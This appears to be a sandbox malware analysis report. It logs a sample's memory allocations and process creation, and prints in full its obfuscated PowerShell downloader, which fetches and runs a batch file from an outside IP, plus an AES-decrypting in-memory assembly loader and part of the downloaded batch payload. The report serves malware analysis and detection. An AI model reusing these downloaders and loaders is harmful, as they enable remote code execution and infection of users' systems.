NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b02000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02273000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02274000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0226b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02275000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02276000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c81000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c82000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c83000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c84000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c85000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c86000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c87000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c88000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c89000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c8a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c8b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c8c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c8d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c8e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c8f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05040000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05041000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05042000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05043000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Roaming\15.bat

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (5 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function gkzChlFZJJ($CLgcLN, $kmBiXxhdPBBuVK){[IO.File]::WriteAllBytes($CLgcLN, $kmBiXxhdPBBuVK)};function EHyqZyfXS($CLgcLN){if($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68399,68407,68407))) -eq $True){rundll32.exe $CLgcLN }elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68411,68414,68348))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $CLgcLN}elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68408,68414,68404))) -eq $True){misexec /qn /i $CLgcLN}else{Start-Process $CLgcLN}};function EcjCVmfjLDzFvM($qDNhNUEOwgjE){$pXytQmYCtNpvKlmM = New-Object (wTbQxZaeCBFXfE @(68377,68400,68415,68345,68386,68400,68397,68366,68407,68404,68400,68409,68415));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kmBiXxhdPBBuVK = $pXytQmYCtNpvKlmM.DownloadData($qDNhNUEOwgjE);return $kmBiXxhdPBBuVK};function wTbQxZaeCBFXfE($IXRsdNnynXKLzp){$gCTQwIlSnN=68299;$gsScNSXbhsG=$Null;foreach($YPrbcjAFtcNCEhncu in $IXRsdNnynXKLzp){$gsScNSXbhsG+=[char]($YPrbcjAFtcNCEhncu-$gCTQwIlSnN)};return $gsScNSXbhsG};function odaqkEMluKlVzieGjH(){$nbpUYlNulSp = $env:AppData + '\';$cnysluAIEDXyIH = $nbpUYlNulSp + 'Note.txt';If(Test-Path -Path $cnysluAIEDXyIH){Invoke-Item $cnysluAIEDXyIH;}Else{ $nzWdArjtuUapYUy = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68377,68410,68415,68400,68345,68415,68419,68415));gkzChlFZJJ $cnysluAIEDXyIH $nzWdArjtuUapYUy;Invoke-Item $cnysluAIEDXyIH;};$iTWyAvaurQ = $nbpUYlNulSp + '15.bat'; if (Test-Path -Path $iTWyAvaurQ){EHyqZyfXS $iTWyAvaurQ;}Else{ $YiQQDI = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68348,68352,68345,68397,68396,68415));gkzChlFZJJ $iTWyAvaurQ $YiQQDI;EHyqZyfXS $iTWyAvaurQ;};;;;}odaqkEMluKlVzieGjH;
cmdline	powershell.exe -ExecutionPolicy UnRestricted function gkzChlFZJJ($CLgcLN, $kmBiXxhdPBBuVK){[IO.File]::WriteAllBytes($CLgcLN, $kmBiXxhdPBBuVK)};function EHyqZyfXS($CLgcLN){if($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68399,68407,68407))) -eq $True){rundll32.exe $CLgcLN }elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68411,68414,68348))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $CLgcLN}elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68408,68414,68404))) -eq $True){misexec /qn /i $CLgcLN}else{Start-Process $CLgcLN}};function EcjCVmfjLDzFvM($qDNhNUEOwgjE){$pXytQmYCtNpvKlmM = New-Object (wTbQxZaeCBFXfE @(68377,68400,68415,68345,68386,68400,68397,68366,68407,68404,68400,68409,68415));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kmBiXxhdPBBuVK = $pXytQmYCtNpvKlmM.DownloadData($qDNhNUEOwgjE);return $kmBiXxhdPBBuVK};function wTbQxZaeCBFXfE($IXRsdNnynXKLzp){$gCTQwIlSnN=68299;$gsScNSXbhsG=$Null;foreach($YPrbcjAFtcNCEhncu in $IXRsdNnynXKLzp){$gsScNSXbhsG+=[char]($YPrbcjAFtcNCEhncu-$gCTQwIlSnN)};return $gsScNSXbhsG};function odaqkEMluKlVzieGjH(){$nbpUYlNulSp = $env:AppData + '\';$cnysluAIEDXyIH = $nbpUYlNulSp + 'Note.txt';If(Test-Path -Path $cnysluAIEDXyIH){Invoke-Item $cnysluAIEDXyIH;}Else{ $nzWdArjtuUapYUy = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68377,68410,68415,68400,68345,68415,68419,68415));gkzChlFZJJ $cnysluAIEDXyIH $nzWdArjtuUapYUy;Invoke-Item $cnysluAIEDXyIH;};$iTWyAvaurQ = $nbpUYlNulSp + '15.bat'; if (Test-Path -Path $iTWyAvaurQ){EHyqZyfXS $iTWyAvaurQ;}Else{ $YiQQDI = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68348,68352,68345,68397,68396,68415));gkzChlFZJJ $iTWyAvaurQ $YiQQDI;EHyqZyfXS $iTWyAvaurQ;};;;;}odaqkEMluKlVzieGjH;
cmdline	C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Roaming\15.bat"
cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes', ''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB', ''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb', ''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr', ''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI', ''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg', ''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UerdI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UerdI.Key=[System.Convert]::($MMJz[12])('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=');$UerdI.IV=[System.Convert]::($MMJz[12])('rrMf8DdSiOTkJYW5AhOOlg==');$ytGVg=$UerdI.($MMJz[3])();$FTQFX=$ytGVg.($MMJz[10])($JKmLP,0,$JKmLP.Length);$ytGVg.Dispose();$UerdI.Dispose();$FTQFX;}function mpyCC($JKmLP){$FjjxJ=New-Object System.IO.MemoryStream(,$JKmLP);$sySFb=New-Object System.IO.MemoryStream;$Rdfpf=New-Object System.IO.Compression.GZipStream($FjjxJ,[IO.Compression.CompressionMode]::($MMJz[5]));$Rdfpf.($MMJz[7])($sySFb);$Rdfpf.Dispose();$FjjxJ.Dispose();$sySFb.Dispose();$sySFb.ToArray();}$BklLD=[System.IO.File]::($MMJz[8])([Console]::Title);$oNBKh=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 5).Substring(2))));$HuDRY=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 6).Substring(2))));[System.Reflection.Assembly]::($MMJz[13])([byte[]]$HuDRY).($MMJz[6]).($MMJz[9])($null,$null);[System.Reflection.Assembly]::($MMJz[13])([byte[]]$oNBKh).($MMJz[6]).($MMJz[9])($null,$null); "
cmdline	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW April 21, 2024, 12:44 p.m.	show_type: 0 filepath_r: powershell.exe parameters: -ExecutionPolicy UnRestricted function gkzChlFZJJ($CLgcLN, $kmBiXxhdPBBuVK){[IO.File]::WriteAllBytes($CLgcLN, $kmBiXxhdPBBuVK)};function EHyqZyfXS($CLgcLN){if($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68399,68407,68407))) -eq $True){rundll32.exe $CLgcLN }elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68411,68414,68348))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $CLgcLN}elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68408,68414,68404))) -eq $True){misexec /qn /i $CLgcLN}else{Start-Process $CLgcLN}};function EcjCVmfjLDzFvM($qDNhNUEOwgjE){$pXytQmYCtNpvKlmM = New-Object (wTbQxZaeCBFXfE @(68377,68400,68415,68345,68386,68400,68397,68366,68407,68404,68400,68409,68415));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kmBiXxhdPBBuVK = $pXytQmYCtNpvKlmM.DownloadData($qDNhNUEOwgjE);return $kmBiXxhdPBBuVK};function wTbQxZaeCBFXfE($IXRsdNnynXKLzp){$gCTQwIlSnN=68299;$gsScNSXbhsG=$Null;foreach($YPrbcjAFtcNCEhncu in $IXRsdNnynXKLzp){$gsScNSXbhsG+=[char]($YPrbcjAFtcNCEhncu-$gCTQwIlSnN)};return $gsScNSXbhsG};function odaqkEMluKlVzieGjH(){$nbpUYlNulSp = $env:AppData + '\';$cnysluAIEDXyIH = $nbpUYlNulSp + 'Note.txt';If(Test-Path -Path $cnysluAIEDXyIH){Invoke-Item $cnysluAIEDXyIH;}Else{ $nzWdArjtuUapYUy = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68377,68410,68415,68400,68345,68415,68419,68415));gkzChlFZJJ $cnysluAIEDXyIH $nzWdArjtuUapYUy;Invoke-Item $cnysluAIEDXyIH;};$iTWyAvaurQ = $nbpUYlNulSp + '15.bat'; if (Test-Path -Path $iTWyAvaurQ){EHyqZyfXS $iTWyAvaurQ;}Else{ $YiQQDI = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68348,68352,68345,68397,68396,68415));gkzChlFZJJ $iTWyAvaurQ $YiQQDI;EHyqZyfXS $iTWyAvaurQ;};;;;}odaqkEMluKlVzieGjH; filepath: powershell.exe	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory April 21, 2024, 12:44 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef80000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses April 21, 2024, 12:44 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (6 events)

Data received	HTTP/1.1 200 OK
Data received	Content-Length: 108 Content-Type: text/plain Connection:close ìë³¼ë£¨ìë°°í ê²ìì´ë¦ ë°°íë´ì íì°¨ ìê° ê¸ì¡ ê²°ê³¼ ë¯¸ì§ê¸ê¸ì¡ ì§ê¸ì ê¸ì¡
Data received	Content-Length: 62382 Content-Type: application/octet-stream Connection:close @echo off set "gwAVRA=seWiBDht aWiBDhPiBWiBDh=1WiBDh &WiBDh&WiBDh sWiBDhtaWiBDhrt WiBDh"WiBDh" WiBDh/mWiBDhinWiBDh WiBDh" set "CMXyhD=&WiBDh& eWiBDhxiWiBDhtWiBDh" set "pEXfDe=noWiBDht WiBDhdeWiBDhfWiBDhiWiBDhneWiBDhd aWiBDhPWiBDhiBWiBDh if %pEXfDe:WiBDh=% (%gwAVRA:WiBDh=%%0 %CMXyhD:WiBDh=%) ::TWUbjYZgF7jo9iEb+syJC0GZd6aI64tyS6zuALFPQcbUImjK73FfuAt8fmS3js4T93zJTaHEgjf/i8aI1/WVfhgpBMCwfZlari72/Isp1xfIyVmMxban1ZXpGV3ARbK6u1O7CFziLo4GZLejD5bD1za9+YChl2tNnztwnW8gNHHT7toY9mSDrP6If/bB/P/bYq5b4Q9M8tVt08uAj1opSh1ZkcGmfsBcH7T++uEBPDLIhoHdsUz0JUH7LxrPkrnnTjd6LgYH8iuzj+ypcAqtETlE/UxFzcWVHghyBOMFSNTMSdGYYyytIKcj88HPgmWga65kuUuCMDXWtPpGVOuWgRaFroKCRDkomCCWdD4cxfPCkffPjQEzJ1Eca41x3CX6NWlB0oSaVw5SixVVSG6YWK2x3xhQlbgJ6FHWtbncDVm1JWxeSkrjD9ZKdHnf8bEy2YPb3M4GJhWSPlklGGc14PgtYNz3o+5D4cpfse9z65B3jONRAYnP/qbHs49DOfBm6xFZIkvpMp/EJaTC2UD6b0165djkw6nEwS3Uh+utecRq2e7V0NO6ibjD63NLS9kyJ3izzpD69Z/R23laBpM15p7P5tumQoYckQrxTSDNgmP+cC81cFSW3q1rvD+y02vOdKCDn1KGlmAuzlACoLXGSBmu4NOqtNJMP/aJUpUgpzreKV1wtRWdUQ4vzFvIEA+rpf7eviNiBAt/DvrLaWKfZnjxKy4lpb4XlTGg+0eM2z0tEbvqafmzKfjUc3gwf4vnrF0kTvfVqix0CwSTn8VbhMzMtIR2cAofJjXVIAvImeh3bauepawbWPhXiygatACpYMiiIX/e3tPJotciBKnhNymtGjPdNcvVo2/laWvjbkqyuPUVIDApzb7ETZaPngOYV0NuKsWVuiRwjDohGOyZ+UqGCy7dzxbuTXUG7VjUtwEJQIlcRYXaAdJ37R1zfWnLZmryLQDk3qX0Nx/c0j8AN8oY9vkuQujhlWBNh05DCPREcr8y8xqmvTAAqrHT+VbgVcXb5uUtpASXOrHH4Q1tqGEL+RB2XYJ7aUMOTFlo4tJ0NoqoV37LOD7lsU0vlGpuRC9WJH7vElF8BpGQCuHAfpjaKZggvuRUPonbcW/Tk+KFVoZnnjfNmS6gqnfG7AvRIkVaubJ4ztVnmf6U8uC5pTXbX2NQge3uzPFr25G3zl/iRD1l4ksa8XCluw0Cu2HCBqPqvcS3PEKdjjnfoENGwxIOrTiuWtJZAQNoVA9suXFk/XgLOwtqxC1G0R5Bmyw1Yzbz9fm1ZVKfvXhadI/a0AxA1rR8VbEHxebT7497/HogUG2fu84SidcGSOpBv1Ob+joy459t1AjxzedvkRmTsNqwC/NTbWvmGg8T65C9DAzKp1/VRTClQS1qoOC/QpO99+Yipu10CL6QUn0NGxph+ZQJiv4NKo/Hxr8viM0ShpHmQeYO/XcqnOAgEhitjJPij4Uv7JTeaJnJAsZTCmRczXoLlCq6XNgDaJOy1L6hatIj5NlvDw7FvFkF9L5skutFoZ2H9sFFxVFUrPvzSLeol7en66UXpxt1+akRsAjpv61SgeeQOq4GfvnQh10G+1uYIt8p6VbFeyVVpM52lcKNK6t6/630Ay1d8Bg53Pq4mWoiE0zq1hS5Fkp1q7ekuVIBNovpvWTzoWC3yIot3vloEKZmF9RjK21JDg5lsUQMiR37btlms3NTz24KduSHjwbyrqEIlwYqCheK9ESbl7Q3C
